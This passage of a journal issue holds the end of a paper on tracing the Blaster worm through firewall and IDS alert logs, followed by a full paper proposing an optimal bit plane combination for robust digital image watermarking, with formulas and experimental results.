[Figure 10 shows the Blaster fingerprint in the IDS alert log: a portsweep (TCP portscan) activity alarm associated with the attacker IP address.]
6 ISSN 1947 5500
To confirm that an exploitation was done by the attacker, extra information can be obtained from the IDS alert log. The main attributes used in the IDS alert log are the date, time, source IP address and destination IP address. If the destination IP address does not exist, the alert has generated a false positive. However, the existence of the source IP address is good enough to verify that this source IP address had launched an attack, reported as portsweep activity in the IDS alert log shown in Figure 12.
IDS alert log tracing algorithm
    Input Date (obtained from victim firewall log, DFWx)
    Input Start Time (obtained from victim firewall log, TFW1x)
    Input End Time (obtained from victim firewall log, TFW2x)
    Input Source IP (obtained from victim firewall log, SrcIPx)
    Input Destination IP (obtained from victim firewall log, DestIPx)
    If (Date = DFWx) and (TFW1x <= Time <= TFW2x) and
       (Source IP = SrcIPx) and (Destination IP = DestIPx)
        Time = TIDS
        Print Date, Time, Source IP, Destination IP, Alert Message
    Else
        If (Date = DFWx) and (TFW1x <= Time <= TFW2x) and (Source IP = SrcIPx)
            Time = TIDS
            Print Date, Time, Source IP, Destination IP, Alert Message
        End
    End
Figure 11: IDS tracing algorithm
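As a hedged sketch (not the authors' code), the Figure 11 algorithm can be applied to already-parsed alert records; the record layout and function name below are assumptions for illustration.

```python
# Sketch of the Figure 11 IDS tracing algorithm over parsed alert
# records (illustrative only; layout and names are our own).
def trace_ids_alerts(alerts, date_x, t_start, t_end, src_ip, dst_ip):
    """Each alert is (date, time, src, dst, msg), times as HH:MM:SS strings.

    Returns matching alerts. Per the text above, a match on the source
    IP alone is still enough to flag the attacker; the final flag marks
    whether the destination IP also matched."""
    hits = []
    for date, time, src, dst, msg in alerts:
        if date == date_x and t_start <= time <= t_end and src == src_ip:
            full = (dst == dst_ip)  # False may indicate a false positive
            hits.append((date, time, src, dst, msg, full))
    return hits
```

Applied to the two portsweep alerts of Figure 12, both records are returned on the strength of the source IP match even though neither destination is the victim host.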
[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
05/07-14:10:56.381141 192.168.2.150 -> 192.168.3.1
PROTO:255 TTL:0 TOS:0x0 ID:14719 IpLen:20 DgmLen:158

[**] [122:3:0] (portscan) TCP Portsweep [**]
[Priority: 3]
05/07-14:11:43.296733 192.168.2.150 -> 192.168.3.34
PROTO:255 TTL:0 TOS:0x0 ID:0 IpLen:20 DgmLen:162 DF
Figure 12: Extracted data from IDS alert log
The extracted data in Figure 12 verifies that the source IP address (192.168.2.150) is the attacker, due to the port scanning alarm generated by the IDS. Thus, all three tracing algorithms have the capability to identify the attacker.
V. CONCLUSION AND FUTURE WORKS
In this study, the researchers have reviewed and analysed the Blaster attack from various logs in different OSI layers, with an approach that focuses on the procedure of media imaging duplication and imaged media analysis. The researchers have selected the most valuable attributes from the log files that are relevant to the attack being traced. From the analysis, the researchers have proposed a technique for tracing the Blaster attack using a specific tracing algorithm, as in Figure 3, for each log, based on the fingerprint of the Blaster attack in the victim logs, attacker logs and IDS alert log. This tracing technique primarily uses a signature-based technique, and the researchers later intend to merge it with an anomaly-based technique to improve the tracing capability. All of these logs are interconnected from one log to another to provide more complete coverage of the attack space information. Further improvement should be made in generalising the process of detecting the worm attack, to produce attack and trace patterns for alert correlation and computer forensic investigation research.
VI. REFERENCES
[1]. Bailey, M., Cooke, E., Jahanian, F., Watson, D., & Nazario, J. (2005). The Blaster Worm: Then and Now. IEEE Computer Society.
[2]. Crandall, J. R., Ensafi, R., Forrest, S., Ladau, J., & Shebaro, B. (2008). The Ecology of Malware. ACM.
[3]. Foster, A. L. (2004). Colleges Brace for the Next Worm. The Chronicle of Higher Education, 50(28), A29.
[4]. Okazaki, Y., Sato, I., & Goto, S. (2002). A New Intrusion Detection Method based on Process Profiling. Paper presented at the Symposium on Applications and the Internet (SAINT '02), IEEE.
[5]. Sekar, R., Gupta, A., Frullo, J., Shanbhag, T., Tiware, A., & Yang, H. (2002). Specification-based Anomaly Detection: A New Approach for Detecting Network Intrusions. Paper presented at the ACM Computer and Communication Security Conference.
[6]. Ko, C., Ruschitzka, M., & Levitt, K. (1997). Execution monitoring of security critical programs in distributed systems: A Specification-based Approach. Paper presented at the IEEE Symposium on Security and Privacy.
[7]. Bashah, N., Shanmugam, I. B., & Ahmed, A. M. (2005). Hybrid Intelligent Intrusion Detection System. Paper presented at the World Academy of Science, Engineering and Technology, June 2005.
[8]. Garcia-Teodoro, P., Diaz-Verdejo, J. E., Marcia-Fernandez, G., & Sanchez-Casad, L. (2007). Network-based Hybrid Intrusion Detection Honeysystems as Active Reaction Schemes. IJCSNS International Journal of Computer Science and Network Security, 7(10), October 2007.
[9]. Adelstein, F., Stillerman, M., & Kozen, D. (2002). Malicious Code Detection For Open Firmware. Paper
presented at the 18th Annual Computer Security Applications Conference (ACSAC '02), IEEE.
[10]. Poolsapassit, N., & Ray, I. (2007). Investigating Computer Attacks using Attack Trees. Advances in Digital Forensics III, 242, 331-343.
[11]. Yusof, R., Selamat, S. R., & Sahib, S. (2008). Intrusion Alert Correlation Technique Analysis for Heterogeneous Log. IJCSNS International Journal of Computer Science and Network Security, 8(9).
[12]. Kao, D.-Y., Wang, S.-J., Huang, F. F.-Y., Bhatia, S., & Gupta, S. (2008). Dataset Analysis of Proxy Logs Detecting to Curb Propagations in Network Attacks. Paper presented at the ISI 2008 Workshops.
[13]. Lincoln Lab, M. (1999). 1999 DARPA Intrusion Detection Evaluation Plan [Electronic Version].
[14]. McAfee. (2003). Virus Profile: W32/Lovsan.worm.a [Electronic Version]. Retrieved 23/7/09 from http://home.mcafee.com/VirusInfo/VirusProfile.aspx?key=100547.
[15]. Microsoft. (2003). Virus alert about the Blaster worm and its variants [Electronic Version]. Retrieved 23/7/09 from http://support.microsoft.com/kb/826955.
[16]. Symantec. (2003). W32.Blaster.Worm [Electronic Version]. Retrieved 23/7/09 from http://www.symantec.com/security_response/writeup.jsp?docid=2003-081113-0229-99.
Optimization of Bit Plane Combination for Efficient Digital Image Watermarking

Sushma Kejgir
Department of Electronics and Telecommunication Engg.
SGGS Institute of Engineering and Technology, Vishnupuri, Nanded, Maharashtra, India.
sbdabade@yahoo.co.in

Manesh Kokare
Department of Electronics and Telecommunication Engg.
SGGS Institute of Engineering and Technology, Vishnupuri, Nanded, Maharashtra, India.
mbkokare@sggs.ac.in
Abstract: In view of frequent multimedia data transfer, authentication and protection of images have gained importance in today's world. In this paper we propose a new watermarking technique, based on bit planes, which enhances the robustness and capacity of the watermark, as well as maintains the transparency of the watermark and the fidelity of the image. In the proposed technique, a higher strength bit plane of the digital signature watermark is embedded into a significant bit plane of the original image. The selection of the combination of bit planes (image and watermark) is an important issue. Therefore, a mechanism is developed for appropriate bit plane selection. Ten different attacks are selected to test the different alternatives. These attacks are given different weightings as appropriate to the user requirement. A weighted correlation coefficient for the retrieved watermark is estimated for each of the alternatives. Based on these estimated values the optimal bit plane combination is identified for a given user requirement. The proposed method is found to be useful for authentication and to prove legal ownership. We observed better results by our proposed method in comparison with previously reported work on a pseudorandom watermark embedded in the least significant bit (LSB) plane.

Keywords: Digital signature watermark, bit plane watermark embedding method, correlation coefficient, weighted correlation coefficient.
I. INTRODUCTION:

A. Motivation:

Watermarking is an important protection and identification technique in which an invisible mark is hidden in multimedia information such as audio, image, video, or text. It has been developed to protect digital signals (information) against illegal reproduction and modification. Watermarking is also useful to prove legal ownership and authentication. Good fidelity, transparent watermarking renders the watermark imperceptible to the human visual system (HVS); that is, the human eye cannot distinguish the original data from the watermarked data.

In the past literature on watermarking it is observed that the bit plane method is one of the recommended methods of watermarking in the spatial domain. This method is characterized by spread spectrum and is blind during watermark retrieval. Optimal implementation of this method maximizes fidelity and robustness against different attacks. The method is based on the fact that the least significant bit plane of the image does not contain visually significant information. Therefore it can be easily replaced with watermark bits without affecting the quality of the original image. However, the survival of the watermark is an open issue, and the two main drawbacks of inserting the watermark in the least significant and most significant bits are:

• If the watermark is inserted in the least significant bit planes, then the watermark may not survive coding, channel noise, mild filtering or random bit-flipping.

• On the other hand, if the watermark is embedded in the most significant bit plane, the watermark survives but the image quality is degraded.

Therefore, to get optimal results in terms of fidelity, robustness, and high embedding capacity, a new bit plane modification method is proposed in this paper.
B. Our Approach:

To overcome the above problems, we propose a novel method for image watermarking. The proposed method differs in two ways from the earlier bit plane watermarking techniques. Firstly, to prove ownership or identify the owner, a more effective digital signature watermark is embedded instead of a pseudorandom watermark. Secondly, instead of the LSB, the bit plane previous to the LSB is identified for watermark embedding, to avoid degradation of the image and to let the watermark survive general attacks such as coding, channel noise, mild filtering or random bit-flipping. The advantages of the proposed method are summarized as follows:

• The proposed approach is optimal.
• It maximizes fidelity.
• It maximizes robustness against different attacks.
• The proposed method has more payload capacity.

The rest of the paper is organized as follows: earlier work related to the bit plane method is discussed in section 2. The proposed significant bit plane modification watermarking algorithm is discussed in section 3. The experimental results are presented in section 4, which is followed by the conclusion and future scope in section 5.
II. RELATED WORK
Sedaaghi and Yousefi [1] embedded the watermark in the LSB bit plane. In this method the watermark is like a noise pattern, i.e. a pseudorandom pattern. The main disadvantage of this technique is that the correlation coefficient (CRC) is very small. This shows that the method cannot withstand attacks such as channel noise (small changes), bit flipping, etc. Yeh and Kuo [2] proposed bit plane manipulation of the LSB method and used quasi m-arrays instead of pseudorandom noise as a watermark. Here, the watermark is recovered after quantization and channel noise attacks. Gerhard et al. [3] discussed pseudorandom LSB watermarking, and highlighted the related work [4-8] wherein LSB modifications are employed. They commented that the LSB modification method is less robust and not very transparent.
In [9], two watermarking algorithms (LSB and discrete wavelet transform) are discussed by Xiao and Xiao. The PSNR of LSB is reported to be higher, i.e. 55.57 dB. An experimental comparison of both against five attacks is made. LSB watermarking is reported to survive only cropping. The simplest spatial domain image watermarking technique is to embed a watermark in the LSB of some randomly selected pixels [10]. The watermark is actually invisible to human eyes. However, the watermark can be easily destroyed if the watermarked image is low-pass filtered or JPEG compressed. In [11], the advantages and disadvantages of LSB and most significant bit (MSB) watermarking are reported by Ren et al. To balance between robustness and fidelity, appropriate bit selection is proposed. Maeder and Planitz [12] demonstrated the utility of LSB watermarking for medical images. A comparison is also made with discrete wavelet transform based watermarking in terms of payload. Fei et al. [13] proposed MSB-LSB decomposition to overcome the drawbacks of fragile authentication systems. However, the use of LSB makes the system vulnerable to attacks. Kumsawat et al. [14] proposed a spread spectrum image watermarking algorithm using the discrete multiwavelet transform.
A threshold value is used for embedding the watermark strength to improve the visual quality of watermarked images and the robustness of the watermark. Chen and Leung [15] presented a technique for image watermarking based on chaos theory. Chaotic parameter modulation (CPM) is employed to modulate the copyright information into the bifurcating parameter of a chaotic system. As the chaotic watermark is only random bits, the problem of ownership identification remains unsolved. Cox et al. [16] advocated that a watermark should be constructed as an independent and identically distributed (i.i.d.) Gaussian random vector that is imperceptibly inserted, in a spread-spectrum-like fashion, into the perceptually most significant spectral components of the data. They argued that insertion of a watermark under this regime makes the watermark robust to signal processing operations (such as lossy compression, filtering, digital-analog and analog-digital conversion, re-quantization, etc.) and common geometric transformations (such as cropping, scaling, translation, and rotation), provided that the original image is available and can be successfully registered against the transformed watermarked image. Ghouti et al. [17] proposed a spread-spectrum communications watermark embedding scheme to achieve watermark robustness. The optimal bounds for the embedding capacity are derived using a statistical model for balanced multiwavelet (BMW) coefficients of the host image. The statistical model is based on a generalized Gaussian distribution. The BMW decomposition could be used constructively to achieve higher data-hiding capacities. The bit error rate is graphically represented and not tested against geometric attacks.
III. PROPOSED WATERMARKING ALGORITHM

The watermark embedding process and extraction process are shown in Fig. 1 and 2 respectively.

The proposed method is simple to apply, robust to different attacks and has good fidelity to the HVS. Broadly, in this method, the original image and watermark are decomposed into bit planes. Combinations of significant bit planes are searched to obtain the optimal bit plane combination. Finally, watermarking is carried out using the identified bit planes.

A. Watermark Embedding and Retrieval:

In this proposed method, let X(m,n) be the grey level image and W(m,n) be the original digital signature
Fig. 1 Watermark embedding process. [The block diagram shows: the original image is decomposed into binary 8 bit planes; the digital signature watermark is resized to the original image size and likewise decomposed into binary 8 bit planes; the optimal combination of original image and high strength watermark bit planes is evolved; the watermarked image is reconstructed (binary to gray); attacks then yield the attacked image.]
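To make the bit plane replacement concrete, the following minimal sketch (our own helper names, not the authors' code) embeds bit plane k of a watermark pixel into bit plane l of an 8-bit image pixel, using the paper's numbering in which plane 1 is the MSB and plane 8 the LSB.

```python
# Minimal sketch of bit plane embedding (illustrative helper names).
# Plane numbering follows the paper: 1 = MSB ... 8 = LSB.
def get_plane(value, plane):
    """Extract bit plane `plane` (1 = MSB ... 8 = LSB) of an 8-bit value."""
    return (value >> (8 - plane)) & 1

def embed_plane(img_pixel, wm_pixel, l, k):
    """Replace bit plane l of the image pixel with bit plane k of the
    watermark pixel (the proposed method uses l = 7, k = 1)."""
    bit = get_plane(wm_pixel, k)
    shift = 8 - l
    return (img_pixel & ~(1 << shift)) | (bit << shift)
```

With the proposed combination (l = 7, k = 1), each pixel changes by at most 2 grey levels, which is consistent with the paper's observation that fidelity stays high while the embedded plane is less fragile than the LSB.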
attacks. In this step, the watermarked image is subjected to ten different types of attacks, leading to the attacked images I*_i(m,n), i ∈ {1, 2, ..., 10} different attacks.

Attacked image I*_i(m,n):

I*(m,n) = I*_1(m,n), I*_2(m,n), ........, I*_i(m,n)    (4)
Step 5: Watermark Retrieval: In this step the attacked image I*_i(m,n) is again transformed into a binary image, i.e. 8 bit planes, as shown below:

I*_i(m,n) = I*_ib1(m,n) + I*_ib2(m,n) + ............ + I*_ib8(m,n)    (5)

Extract the watermark bit plane from the attacked image. This retrieved watermark, after attack, is denoted as W*_ib1(m,n).
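The retrieval in Step 5 amounts to reading back the embedded bit plane from the attacked image; a minimal sketch, assuming flat pixel lists and our own function name:

```python
# Sketch of Step 5 (illustrative helper, not the authors' code):
# recover the watermark bits stored at image plane l (1 = MSB ... 8 = LSB)
# from each 8-bit pixel of the possibly attacked image.
def retrieve_watermark(attacked_pixels, l):
    """Return the embedded bits (0/1) read from bit plane l of each pixel."""
    shift = 8 - l
    return [(p >> shift) & 1 for p in attacked_pixels]
```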
Step 6: Computation of CRC: The correlation coefficient between the retrieved watermark and the original watermark is estimated using the standard equation (6). The estimated correlation coefficients are denoted as CRC_i(l, k), where i indicates the different attacks, l is taken as the 7th and 8th bit planes of the original image as selected in step 3, and k denotes the bit planes of the watermark from 1 to 8. The quality of
Fig. 6 Watermarked images after embedding the watermark in each of the eight bit planes of the image (panels: 1st through 8th bit plane embedding).
Fig. 5 Decomposed original image into eight bit planes (panels: 1st bit plane (MSB) through 8th bit plane (LSB)).
watermarked image is observed by the HVS. CRC varies between 0 and 1. CRC is defined as given below:

CRC = [ Σ(m=1..256) Σ(n=1..256) W(m,n) × W*(m,n) ] / sqrt[ Σ(m=1..256) Σ(n=1..256) W(m,n) × Σ(m=1..256) Σ(n=1..256) W*(m,n) ]    (6)
if CRC_i(l, k) = 0, less robust watermarking;
if CRC_i(l, k) = 1, highly robust watermarking.    (7)
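A minimal sketch of the CRC computation, assuming equation (6) is the standard normalized cross-correlation specialized to binary bit planes (this is our reading of the equation; the function name and flat-list layout are ours):

```python
# Sketch of equation (6) under the assumption of normalized
# cross-correlation for binary (0/1) bit planes; for binary values
# W^2 = W, so the denominator uses the plain sums.
from math import sqrt

def crc(w, w_star):
    """Correlation between two same-sized binary bit planes given as
    flat lists of 0/1 values; returns a value in [0, 1]."""
    num = sum(a * b for a, b in zip(w, w_star))
    den = sqrt(sum(w) * sum(w_star))
    return num / den if den else 0.0
```

An identical retrieved plane yields CRC = 1; disjoint planes yield CRC = 0, matching the interpretation given in equation (7).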
Step 7: Estimation of peak signal to noise ratio (PSNR): PSNR is calculated by using the following equation. The capacity of the original image to carry the watermark is computed by measuring PSNR, which is defined as follows:

PSNR = 10 log10( (255)^2 / MSE ) dB    (8)

The mean square error is defined as:

MSE = ( 1 / (m × n) ) Σ(m=1..256) Σ(n=1..256) ( W(m,n) − W*(m,n) )^2    (9)

where W(m,n) is the original watermark and W*(m,n) is the extracted watermark after attack.
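Equations (8) and (9) can be sketched directly (helper names are ours; note that for identical images the MSE is zero and the PSNR is unbounded):

```python
# Sketch of equations (8) and (9) for 8-bit data (illustrative names).
from math import log10

def mse(w, w_star, m, n):
    """Mean square error over an m x n image pair given as flat lists."""
    return sum((a - b) ** 2 for a, b in zip(w, w_star)) / (m * n)

def psnr(w, w_star, m, n):
    """PSNR in dB per equation (8); infinite when the images match."""
    e = mse(w, w_star, m, n)
    return float("inf") if e == 0 else 10 * log10(255 ** 2 / e)
```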
Step 8: Weighted correlation coefficient computation:
Fig 7. Result of retrieved watermarks after different attacks for the existing method (8th bit plane of the original image replaced with the 8th bit plane of a pseudorandom watermark). Panels show the watermarked image, the original pseudorandom watermark, and the watermark retrieved after each of the ten attacks: angle rotation, rotate transform, cropping of 41%, low pass filter, quantization, translation motion, contrast stretching, salt and pepper, compression, and shrinking.
The weighted correlation coefficient is defined as follows:

Wt.CRC(l, k) = Σ(i=1..10) CRC_i(l, k) × a_i    (10)

where a_i are the different weightings of the attacks such that their total a_1 + a_2 + ... + a_10 = 1, and i is the number of attacks. The identified attacks are assigned weightings by the user based on damage caused, frequency, intensity, criticality, or any other such criterion. Based on these weightings, considering all ten attacks, weighted correlation coefficients are estimated for each bit plane combination of image and watermark under consideration. The step is repeated for the combinations of the selected bit planes of the image and all the bit planes of the watermark respectively.
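A minimal sketch of equation (10), including a check that the attack weightings a_i sum to 1 (function name and data layout are ours):

```python
# Sketch of equation (10): weighted CRC for one bit plane combination.
def weighted_crc(crcs, weights):
    """crcs: CRC_i(l, k) for the ten attacks; weights: a_1 ... a_10,
    which must sum to 1 as required by the text."""
    assert abs(sum(weights) - 1.0) < 1e-9, "attack weights must sum to 1"
    return sum(c * a for c, a in zip(crcs, weights))
```

With equal weights a_1 to a_10 = 0.1 (the first user requirement of Table 1), Wt.CRC reduces to the plain average of the ten CRC values.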
Step 9: Optimization: The above step 8 is repeated by varying the weightings of the attacks. The bit plane combination of the original image and watermark for which the weighted correlation coefficient is maximum is selected as the optimal one for the given user requirements. This combination is used for optimized watermarking in terms of robustness and fidelity.
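Step 9's selection can be sketched as an argmax over the candidate combinations (the mapping layout is assumed for illustration):

```python
# Sketch of Step 9 (assumed data layout): pick the bit plane
# combination (l, k) with the maximal weighted CRC for the user's
# attack weights. `table` maps (l, k) -> list of ten CRC values.
def best_combination(table, weights):
    return max(table,
               key=lambda lk: sum(c * a for c, a in zip(table[lk], weights)))
```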
Fig 8. Result of retrieved watermarks after different attacks for the proposed method (7th bit plane of the original image replaced with the 1st bit plane of the digital signature watermark). Panels show the watermarked image, the original digital signature watermark, and the watermark retrieved after each of the ten attacks: angle rotation, rotate transform, cropping of 41%, low pass filter, quantization, translation motion, contrast stretching, salt and pepper, compression, and shrinking.
IV. EXPERIMENTAL RESULTS

We have implemented our method on a still grey scale image (dimension 256 × 256). In the subsections that follow, extensive analysis is carried out to evolve the optimal combination of bit planes (image and watermark) to achieve the desirable properties after watermarking.

A. Fidelity Checked by HVS

The results are displayed in Fig. 7, 8, 9, and 10. Each of these figures displays the watermarked image, the original watermark, and the retrieved watermark after different attacks. All these figures exhibit the fidelity of the watermarked image and the survival of the watermark after attacks.

For comparison, the original watermark is presented for each combination of the bit planes. Through these figures, the fidelity of the watermarked image and the survival of the watermark after different attacks can be visually checked for the various combinations of image and watermark bit planes. Fig. 7 displays the results of the existing method [1] (LSB, pseudorandom watermark embedding).

Here, the watermark survives seven out of the ten different types of attacks. The retrieved watermark visually appears the same as the original watermark, but the automated correlation coefficient (standard method) is very small. This indicates that the retrieved watermark is not similar to the original watermark. Fig. 8 shows the result of the combination where the 1st bit plane of the watermark is embedded in the 7th bit plane of the original
Fig 9. Result of retrieved watermarks after different attacks, for comparison with the proposed method (8th bit plane of the original image replaced with the 8th bit plane of the digital signature watermark). Panels show the watermarked image, the original digital signature watermark, and the watermark retrieved after each of the ten attacks.
image, which shows survival of the watermark against seven different attacks with good fidelity of the watermarked image. Fig. 9 shows the results for another combination of bit planes (for example, the 8th bit plane of the digital signature watermark embedded in the 8th bit plane of the original image). This result shows good fidelity, but the watermark survives the minimum number of attacks (five). Fig. 10 shows that survival of the watermark is good but the fidelity of the watermarked image is bad (1st bit plane of the watermark embedded in the 1st bit plane of the original image).

Thus, the above results indicate that the bit plane combination with the 1st bit plane of the watermark embedded in the 7th bit plane of the original image exhibits superiority over all others with respect to fidelity, and is hence recommended by the proposed method.
B. CRC Results

CRC after different attacks and for different combinations of bit planes is compared in Fig. 11. CRC is plotted on the y axis and the different attacks are plotted on the x axis, numbered as follows:

1. Angle rotation attack. 2. Rotate transform attack. 3. Crop attack 41%. 4. LPF (low pass filter) attack. 5. Quantization attack. 6. Translation motion attack. 7. Contrast stretching attack. 8. Salt and pepper attack. 9. Compression attack. 10. Shrinking attack.

CRC for the different methods after the different attacks is given in the legend: pseudo 8-8 indicates a pseudorandom watermark (8th bit plane embedded in the 8th bit plane), pseudo 1-1 indicates a pseudorandom watermark (1st bit plane embedded in the 1st bit plane), signature 8-8 indicates a digital signature
Fig 10. Result of retrieved watermarks after different attacks, for comparison with the proposed method (1st bit plane of the original image replaced with the 1st bit plane of the digital signature watermark). Panels show the watermarked image, the original digital signature watermark, and the watermark retrieved after each of the ten attacks.
watermark (8th bit plane embedded in the 8th bit plane), etc. The graph shows that, for pseudo 8-8 and pseudo 1-1, CRC is near the zero line, and that CRC is maximum for the signature 1-1 combination, although fidelity is bad for that method. The graph also shows that CRC is at a higher level for the combination recommended by the proposed method (signature 7-1), and for this combination fidelity is also good, as displayed in Fig. 8.
[Fig. 11 plots the correlation coefficient (y axis, 0 to 1) against the ten attacks (x axis, 1 to 10), with legend: pseudo:8-8, pseudo:1-1, signature:8-8, signature:1-1, signature:7-1.]
[Fig. 12 plots PSNR in dB (y axis, 50 to 100) for the fixed 1st bit plane of the watermark combined with variable bit planes of the image (x axis, 1 to 8).]

Fig. 12. PSNR for combinations of different bit planes of the original image with the 1st bit plane of the watermark.
C. PSNR Result

In addition to the above, for the proposed bit plane combination the watermark embedding capacity, i.e. PSNR, is observed to be high (87 dB). PSNR for combinations of different bit planes of the original image with the 1st (higher strength) bit plane of the watermark is displayed in Fig. 12. From this it is observed that the combination of the 8th bit plane of the image and the 1st bit plane of the watermark is capable of a higher payload, but this combination is sensitive to small changes like bit flipping and is robust to fewer attacks (refer to Fig. 8 and 9 and Table 1). Therefore the previous bit plane (7th) of the image is good for watermarking.
Table 1. Weighted CRC for different combinations of original image and watermark bit planes.

User requirements (attack weightings):
  1. Wt.CRC: equal weights for all attacks, i.e. a1 to a10 = 0.1
  2. Wt.CRC: a1 = 0.05; a2 = 0.05; a3 = 0.05; a4 = 0.05; a5 = 0.05; a6 = 0.05; a7 = 0.2; a8 = 0.2; a9 = 0.2; a10 = 0.1
  3. Wt.CRC: a1 = 0.025; a2 = 0.05; a3 = 0.025; a4 = 0.025; a5 = 0.025; a6 = 0.05; a7 = 0.1; a8 = 0.4; a9 = 0.1; a10 = 0.2
  4. Wt.CRC: a1 = 0.025; a2 = 0.025; a3 = 0.05; a4 = 0.05; a5 = 0.05; a6 = 0.05; a7 = 0.05; a8 = 0.2; a9 = 0.3; a10 = 0.2

Bit plane combination com.(l, k)   1.Wt.CRC   2.Wt.CRC   3.Wt.CRC   4.Wt.CRC
Com. (7,8)                         0.7854     0.8703     0.9212     0.8955
Com. (7,7)                         0.7855     0.8703     0.9212     0.8955
Com. (7,6)                         0.7857     0.8708     0.9220     0.8959
Com. (7,5)                         0.7859     0.8713     0.9225     0.8962
Com. (7,4)                         0.8106     0.8849     0.9285     0.9082
Com. (7,3)                         0.8107     0.8849     0.9284     0.9081
Com. (7,2)                         0.8110     0.8854     0.9291     0.9086
Com. (7,1)                         0.8115     0.8861     0.9300     0.9091
Com. (8,8)                         0.7855     0.8704     0.9213     0.8955
Com. (8,7)                         0.7850     0.8700     0.9206     0.8950
Com. (8,6)                         0.7854     0.8705     0.9215     0.8956
Com. (8,5)                         0.7859     0.8712     0.9224     0.8962
Com. (8,4)                         0.8108     0.8850     0.9286     0.9083
Com. (8,3)                         0.8103     0.8847     0.9281     0.9078
Com. (8,2)                         0.8108     0.8852     0.9289     0.9084
Com. (8,1)                         0.8114     0.8859     0.9297     0.9090
D. Weighted CRC Results
In Table 1, the first column lists the different bit plane combinations attempted in this work for digital image watermarking. The remaining columns give the weighted CRC results for these combinations under varying attack weightings. Here a1, a2, ..., a10 denote the weightings assigned to the respective attacks.

From the results shown in Table 1, it can be observed that the proposed method (1st bit plane of the signature watermark embedded in the 7th bit plane of the original image) provides the optimal combination, yielding the highest CRC values, as highlighted in the table. Table 1 thus identifies the optimal bit plane method showing maximum robustness, in terms of CRC, for a given set of user requirements.
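The weighted CRC of Table 1 is, as described, a sum of per-attack correlation coefficients scaled by user-chosen weights a1-a10 that sum to 1. An illustrative sketch (the CRC values below are made up, not taken from the paper):

```python
def weighted_crc(crc_per_attack, weights):
    """Weighted CRC: per-attack correlation coefficients scaled by
    user-supplied attack weights a1..a10 (weights must sum to 1)."""
    assert abs(sum(weights) - 1.0) < 1e-9, "attack weights must sum to 1"
    return sum(c * a for c, a in zip(crc_per_attack, weights))

# equal weighting of ten attacks (scenario 1 in Table 1)
crc = [0.9, 0.8, 0.85, 0.7, 0.95, 0.9, 0.75, 0.8, 0.85, 0.9]
equal = [0.1] * 10
print(round(weighted_crc(crc, equal), 3))   # 0.84
```

Raising the weight of a particular attack (as in scenarios 2-4 of Table 1) makes the figure reflect robustness against that attack more strongly.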
V. CONCLUSION
We observed that in the previous bit plane methods the survival of the watermark appears to be good, but the CRC is near the zero level. The proposed method has the ability to
perform better than the existing bit-plane-based methods, as higher CRC values are achieved. Also, when the pseudorandom watermark is replaced with a digital signature watermark there is a rise in CRC, indicating improved robustness of the watermark. We observed that, in the image, the bit plane prior to the LSB also does not contain visually significant information, so it can be selectively used to embed the watermark optimally. Referring to the results shown in Table 1, it can be concluded that the proposed method leads to robust watermarking against geometric attacks and also yields the highest correlation coefficient compared to the previous bit plane method and other combinations of bit planes. It can also be noted that the PSNR value for the proposed method is higher, i.e. above 87 dB.
It is noted that the weighted correlation coefficient is useful for estimating the effect on the CRC of a change in the user environment (in terms of variation in the attack weightings) while identifying the optimal bit plane combination. In future work, the survival of the watermark against various other attacks can be checked.
REFERENCES
[1] M. H. Sedaaghi and S. Yousefi, "Morphological watermarking", IEE Electronics Letters, vol. 41, no. 10, pp. 591-593, 12 May 2005.
[2] C. H. Yeh and C. J. Kuo, "Digital watermarking through quasi m-arrays", Proc. of 25th Annual IEEE Conf. on Industrial Electronics Society, vol. 1, pp. 459-461, Nov. 1999.
[3] G. C. Langelaar, I. Setyawan, and R. L. Lagendijk, "Watermarking digital image and video data", IEEE Signal Processing Magazine, pp. 20-46, Sept. 2000.
[4] R. G. van Schyndel, A. Z. Tirkel, and C. F. Osborne, "A digital watermark", Proc. IEEE Int. Conf. on Image Processing, vol. 2, pp. 86-90, Nov. 1994.
[5] T. Aura, "Invisible communication", Proc. HUT Seminar on Network Security '95, Espoo, Finland, 6 Nov. 1995.
[6] T. Aura, "Practical invisibility in digital communication", Proc. of Workshop on Information Hiding, Lecture Notes in Computer Science, vol. 1174, Cambridge, U.K., pp. 257-264, May 1996.
[7] K. Hirotsugu, "An image digital signature system with ZKIP for the graph isomorphism", Proc. of IEEE Int. Conf. on Image Processing, vol. 3, Lausanne, Switzerland, pp. 247-250, Sept. 1996.
[8] J. Fridrich and M. Goljan, "Protection of digital images using self embedding", Proc. of Symposium on Content Security and Data Hiding in Digital Media, New Jersey Institute of Technology, Newark, NJ, USA, pp. 1259-1284, May 1999.
[9] M. Xiao, L. Yu, and C. Liua, "Comparative research of robustness for image watermarking", IEEE Int. Conf. on Computer Science and Software Engineering, pp. 700-703, 2008.
[10] M. D. Swanson, M. Kobayashi, and A. Tewfik, "Multimedia data-embedding and watermarking technologies", Proc. of the IEEE, vol. 86, no. 6, pp. 1064-1087, June 1998.
[11] J. Ren, T. Li, and M. Nadooshan, "A cryptographic watermark embedding technique", IEEE Asilomar Conf. on Signals, Systems and Computers, pp. 382-386, 2004.
[12] A. J. Maeder and B. M. Planitz, "Medical image watermarking for multiple modalities", 34th IEEE Proc. on Applied Imagery and Pattern Recognition Workshop, pp. 158-165, 2005.
[13] C. Fei, D. Kundur, and R. H. Kwong, "Analysis and design of secure watermark-based authentication systems", IEEE Trans. on Information Forensics and Security, vol. 1, no. 1, pp. 43-55, March 2006.
[14] P. Kumsawat, K. Attakitmongcol, and A. Srikaew, "A New Approach for Optimization in Image Watermarking by Using Genetic Algorithms", IEEE Trans. on Signal Processing, vol. 53, no. 12, pp. 4707-4719, December 2005.
[15] S. Chen and H. Leung, "Ergodic Chaotic Parameter Modulation With Application to Digital Image Watermarking", IEEE Trans. on Image Processing, vol. 14, no. 10, pp. 1590-1602, October 2005.
[16] I. J. Cox, J. Kilian, F. T. Leighton, and T. Shamoon, "Secure Spread Spectrum Watermarking for Multimedia", IEEE Trans. on Image Processing, vol. 6, no. 12, pp. 1673-1686, December 1997.
[17] L. Ghouti, A. Bouridane, M. K. Ibrahim, and S. Boussakta, "Digital Image Watermarking Using Balanced Multiwavelets", IEEE Trans. on Signal Processing, vol. 54, no. 4, pp. 1519-1536, April 2006.
Sushma Kejgir is an Assistant Professor in the Department of Electronics and Telecommunication Engineering at Shri Guru Gobind Singhji Institute of Engineering and Technology, Vishnupuri, Nanded, India. Her subjects of interest include digital image watermarking and electromagnetic engineering.

